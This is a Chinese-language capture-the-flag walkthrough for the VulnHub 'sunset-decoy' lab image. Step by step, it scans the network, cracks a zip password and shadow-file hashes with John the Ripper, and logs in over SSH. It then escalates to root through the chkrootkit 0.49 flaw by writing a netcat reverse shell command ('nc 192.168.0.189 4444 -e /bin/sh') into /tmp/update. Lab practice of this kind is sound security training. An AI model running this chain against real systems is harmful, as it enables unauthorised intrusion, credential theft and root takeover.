今天實踐的是vulnhub的sunset-decoy鏡像,

下載地址,https://download.vulnhub.com/sunset/decoy.ova,

用virtualbox導入,做地址掃描,

sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

瀏覽器訪問http://192.168.0.190,

下載save.zip,解壓發現需要密碼,

準備破解密碼的hash文件,zip2john save.zip > pass.hash,

破解,john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash,

獲取到解壓密碼,manuel,解壓后發現里面有密碼hash文件,

破解,john --wordlist=/usr/share/wordlists/rockyou.txt etc/shadow,

獲取到用戶名296640a3b825115a47b68fc44501c828的密碼server,

ssh登錄到靶機,

ssh 296640a3b825115a47b68fc44501c828@192.168.0.190 -t "bash --noprofile",

查看日志文件,/bin/cat log.txt,

獲取到chkrootkit-0.49信息,

查找可利用的漏洞,searchsploit chkrootkit,

進一步查看利用方法,searchsploit -p 33899,

cat /usr/share/exploitdb/exploits/linux/local/33899.txt,

說是讓在tmp目錄創建個update文件,

進入tmp目錄,cd /tmp,寫個反彈shell腳本,

echo "/usr/bin/nc 192.168.0.189 4444 -e /bin/sh" > update,

給腳本開執行權限,/bin/chmod 777 update,

kali攻擊機上用nc開個反彈shell監聽,nc -lvp 4444,

回到用戶目錄下執行honeypot.decoy,選擇第5項,病毒掃描,

稍等一會兒,反彈shell就過來了,id確認是root,